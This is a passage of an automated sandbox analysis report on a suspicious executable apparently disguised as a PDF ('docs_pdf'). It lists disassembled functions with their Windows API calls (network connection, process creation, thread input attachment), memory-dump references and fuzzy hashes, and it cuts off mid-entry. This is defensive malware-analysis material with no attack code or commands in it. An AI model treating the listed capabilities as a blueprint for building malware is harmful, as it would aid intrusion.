                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                    • String ID:
                                    • API String ID: 521402451-0
                                    • Opcode ID: faba416e9e8fc89a2ccf3f68ee63a70f95135b494d4a837d6ac27ccbb78af7d7
                                    • Instruction ID: b5ea99d0bfcbf1230719eeea0f29013fcc39090ad78f613e715a8d2a589140f9
                                    • Opcode Fuzzy Hash: faba416e9e8fc89a2ccf3f68ee63a70f95135b494d4a837d6ac27ccbb78af7d7
                                    • Instruction Fuzzy Hash: 8B112432A042046BDB05B7B59C42AFE7B6A9F41320F18415BF204A7291DE7D6982AB95
                                    Function 01021A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01021A97
                                      • Part of subcall function 01021B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01021B40
                                      • Part of subcall function 01021B21: InternetCloseHandle.WININET(00000000), ref: 01021BDD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: 42e7305639344b398a957e2ee6b5c2a76304314ffef163da08b082d7d2b75317
                                    • Instruction ID: db58711321d9fcc42770b893970256ff09ab3e2fb2bfebd632ca37f172336f25
                                    • Opcode Fuzzy Hash: 42e7305639344b398a957e2ee6b5c2a76304314ffef163da08b082d7d2b75317
                                    • Instruction Fuzzy Hash: E6219F35204616BFEB229F648C00FBBBBFDFF58601F00401AFA9596650EB7194119BA0
                                    Function 0100E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0100F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0100E1C4,?,?,?,0100EFB7,00000000,000000EF,00000119,?,?), ref: 0100F5BC
                                      • Part of subcall function 0100F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0100F5E2
                                      • Part of subcall function 0100F5AD: lstrcmpiW.KERNEL32(00000000,?,0100E1C4,?,?,?,0100EFB7,00000000,000000EF,00000119,?,?), ref: 0100F613
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0100EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0100E1DD
                                    • lstrcpyW.KERNEL32(00000000,?), ref: 0100E203
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0100EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0100E237
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: fa587f489e3a9535e72628a000e94b3beac412349a781067ea161b3a7dca510b
                                    • Instruction ID: 0de53b6601dd71dea8c364eb6f10d8ac1600c8f187f01bea919c8e51d6267691
                                    • Opcode Fuzzy Hash: fa587f489e3a9535e72628a000e94b3beac412349a781067ea161b3a7dca510b
                                    • Instruction Fuzzy Hash: 8811D336100302EFEB26AF68D844D7A77F9FF85310F40456AE946CB294EB719850D791
                                    Function 00FE5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00FE5351
                                      • Part of subcall function 00FD594C: __FF_MSGBANNER.LIBCMT ref: 00FD5963
                                      • Part of subcall function 00FD594C: __NMSG_WRITE.LIBCMT ref: 00FD596A
                                      • Part of subcall function 00FD594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,00FD1013,?), ref: 00FD598F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 3db75d9e0ea960897cb2b494a98c104a3d89808a003045a919bba03c4327c115
                                    • Instruction ID: 8c10f8d3b66c0dcc222ea64c334d874daf3affb9360ea28f6120244a5b8cf1e5
                                    • Opcode Fuzzy Hash: 3db75d9e0ea960897cb2b494a98c104a3d89808a003045a919bba03c4327c115
                                    • Instruction Fuzzy Hash: EF112732D04A06AFCB302F72AC0175D379B5F10BF4F28442BF9459A291DE7A8941B791
                                    Function 00FB4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00FB4560
                                      • Part of subcall function 00FB410D: _memset.LIBCMT ref: 00FB418D
                                      • Part of subcall function 00FB410D: _wcscpy.LIBCMT ref: 00FB41E1
                                      • Part of subcall function 00FB410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FB41F1
                                    • KillTimer.USER32(?,00000001,?,?), ref: 00FB45B5
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB45C4
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FED6CE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: 5e38b4d30b26a6a284c3b5948dfb008c57bbf09f92f116ff2040765f419e3b55
                                    • Instruction ID: ea7591125164f08448b8e3876a1afbde57d8336b69e28d7e3e532658dd1252c1
                                    • Opcode Fuzzy Hash: 5e38b4d30b26a6a284c3b5948dfb008c57bbf09f92f116ff2040765f419e3b55
                                    • Instruction Fuzzy Hash: 5021DA71D047849FEB328B25D845BE7BBEC9F01314F04009DE6DE56246C7796A84AF51
                                    Function 010140B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 010140D1
                                    • _memset.LIBCMT ref: 010140F2
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 01014144
                                    • CloseHandle.KERNEL32(00000000), ref: 0101414D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
                                    • Opcode ID: 5aee7a0336c50019c2f6fd8e60fc15b56fd94cbe142739897d699ce3f9db0a73
                                    • Instruction ID: c78f154f4b06d85345cad1dd2aeb204756af6df92137e70cbe93118fa210f642
                                    • Opcode Fuzzy Hash: 5aee7a0336c50019c2f6fd8e60fc15b56fd94cbe142739897d699ce3f9db0a73
                                    • Instruction Fuzzy Hash: B3110D75D012287AD7305AA5AC4DFABBBBCEF45760F0041D6F908D7180D6744E40CBA5
                                    Function 0102667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01017B20,?,?,00000000), ref: 00FB5B8C
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01017B20,?,?,00000000,?,?), ref: 00FB5BB0
                                    • gethostbyname.WSOCK32(?,?,?), ref: 010266AC
                                    • WSAGetLastError.WSOCK32(00000000), ref: 010266B7
                                    • _memmove.LIBCMT ref: 010266E4
                                    • inet_ntoa.WSOCK32(?), ref: 010266EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                    • String ID:
                                    • API String ID: 1504782959-0
                                    • Opcode ID: 91f752d5bf909519583f5c333da4401b81ef14d4499256ca9a3f887952040371
                                    • Instruction ID: 687d0be19b9c5f1b696b36cb3d809aa90801ee5695439fc24e22829bc8e2e4d4
                                    • Opcode Fuzzy Hash: 91f752d5bf909519583f5c333da4401b81ef14d4499256ca9a3f887952040371
                                    • Instruction Fuzzy Hash: 0911903590010AAFCB04FFA5DD86DEEB7BCAF44710B048065F502A7161DF39AE04DB61
                                    Function 01009023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 01009043
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01009055
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0100906B
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01009086
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 4c438d7165c4e6843603e0c443dcba9892a0c325cd8c387ff4f997ac5b394580
                                    • Instruction ID: f5170313c45212adad24b304627de3d57951db206bbb194a8debb1d38d423a8e
                                    • Opcode Fuzzy Hash: 4c438d7165c4e6843603e0c443dcba9892a0c325cd8c387ff4f997ac5b394580
                                    • Instruction Fuzzy Hash: A8114C79900219FFEB11DFA9C984E9DBBB8FB48310F204095FA44B7291D6726E10DB90
                                    Function 00FB1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00FB12D8
                                    • GetClientRect.USER32(?,?), ref: 00FEB84B
                                    • GetCursorPos.USER32(?), ref: 00FEB855
                                    • ScreenToClient.USER32(?,?), ref: 00FEB860
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Client$CursorLongProcRectScreenWindow
                                    • String ID:
                                    • API String ID: 4127811313-0
                                    • Opcode ID: af2f6e973947e6b4803cbedfdce1e7eff0255321cf53fc7b94d3c024add1db5f
                                    • Instruction ID: 022ac3a93d41ce5770b30773c2757d88442098626e77b3e35f0d24dc612ec051
                                    • Opcode Fuzzy Hash: af2f6e973947e6b4803cbedfdce1e7eff0255321cf53fc7b94d3c024add1db5f
                                    • Instruction Fuzzy Hash: C7113A36A0001AAFCB14EFA5D895DFE77B8FB05301F500456F951E7240C735BA51AFA5
                                    Function 01011652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 0101166F
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 01011694
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 0101169E
                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 010116D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: 1258f2659d3227033e6ae5855e8258b8b059f53d8bb2da4c5e98883bd889eb72
                                    • Instruction ID: 44eeb4375dfa2f6d60ad0c195d19f26a20997bfa03f0f4447756c371abcc92dc
                                    • Opcode Fuzzy Hash: 1258f2659d3227033e6ae5855e8258b8b059f53d8bb2da4c5e98883bd889eb72
                                    • Instruction Fuzzy Hash: 7E115A31D0051DDBCF149FE5E848AEEBF78FF09741F084489EAC0B6248CB3A55608B96
                                    Function 00FE7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction ID: dcd467074f7b32898a70f948a34e2a91ac95222207245c72258bec94b00c3309
                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction Fuzzy Hash: 0301493644828ABBCF126E96DC018EE3F62BF69351B598615FB1858031D237C9B1BF81
                                    Function 0103B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 0103B59E
                                    • ScreenToClient.USER32(?,?), ref: 0103B5B6
                                    • ScreenToClient.USER32(?,?), ref: 0103B5DA
                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0103B5F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClientRectScreen$InvalidateWindow
                                    • String ID:
                                    • API String ID: 357397906-0
                                    • Opcode ID: fb3a6fd11e2e92e5a7b7f7b979a8ccf0d8191da149bb5e6610615d2a905c4400
                                    • Instruction ID: fbf7427a8fe0311fac3b1c29bc9e6e5f9b0bdf60b2d1fc54c0e7b56404ed599e
                                    • Opcode Fuzzy Hash: fb3a6fd11e2e92e5a7b7f7b979a8ccf0d8191da149bb5e6610615d2a905c4400
                                    • Instruction Fuzzy Hash: B71163B9D0020AEFDB51DFA9C484AEEFBF9FB08310F108156E954E3210D735AA559F91
                                    Function 0103B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0103B8FE
                                    • _memset.LIBCMT ref: 0103B90D
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01077F20,01077F64), ref: 0103B93C
                                    • CloseHandle.KERNEL32 ref: 0103B94E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: 9fcff193cd95e4ba76e6244b020e648e8899b8f6e8173c30f66deeb51d55b53f
                                    • Instruction ID: 75136552954cbd485c7ac0f77dadd79f40a9687fcfe8308988d0ed0033658744
                                    • Opcode Fuzzy Hash: 9fcff193cd95e4ba76e6244b020e648e8899b8f6e8173c30f66deeb51d55b53f
                                    • Instruction Fuzzy Hash: F5F089B19403007BF2203765AD0DF7B3A5CEB09398F004011FB48E6286D77A491087A9
                                    Function 01016E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnterCriticalSection.KERNEL32(?), ref: 01016E88
                                      • Part of subcall function 0101794E: _memset.LIBCMT ref: 01017983
                                    • _memmove.LIBCMT ref: 01016EAB
                                    • _memset.LIBCMT ref: 01016EB8
                                    • LeaveCriticalSection.KERNEL32(?), ref: 01016EC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                    • String ID:
                                    • API String ID: 48991266-0
                                    • Opcode ID: 536cabab442aa33f1e498b8419b090e3ec674531b28a349d455ef6c489f94687
                                    • Instruction ID: 6cc86ebcfb75a08bb78c408e80975a4de8e672a3d373bc73f6a92953382a0b3a
                                    • Opcode Fuzzy Hash: 536cabab442aa33f1e498b8419b090e3ec674531b28a349d455ef6c489f94687
                                    • Instruction Fuzzy Hash: DBF0543A500200BBCF116F55DC84E89BB2AEF45320B08C055FE089E21AC775A911DBB5
                                    Function 0103C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB134D
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB135C
                                      • Part of subcall function 00FB12F3: BeginPath.GDI32(?), ref: 00FB1373
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB139C
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0103C030
                                    • LineTo.GDI32(00000000,?,?), ref: 0103C03D
                                    • EndPath.GDI32(00000000), ref: 0103C04D
                                    • StrokePath.GDI32(00000000), ref: 0103C05B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: bb3a05f620b5ad4fde42701a8bd2cfb3fdbef3c7ad628fd473cb795a93c8a9b5
                                    • Instruction ID: 8cb880905b2469541c81d3d8807fa50d50537055c935b85b6eda08ffa5a5d16e
                                    • Opcode Fuzzy Hash: bb3a05f620b5ad4fde42701a8bd2cfb3fdbef3c7ad628fd473cb795a93c8a9b5
                                    • Instruction Fuzzy Hash: A7F09A3140025ABAEB222E58AC09FCA3F98AF06310F044100FA92610D1C76A1260CF96
                                    Function 0100A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0100A399
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100A3AC
                                    • GetCurrentThreadId.KERNEL32 ref: 0100A3B3
                                    • AttachThreadInput.USER32(00000000), ref: 0100A3BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 7b1be3c0f08cf98664e16f205f4215103fe62e1e85109a5767333d0a2102c16f
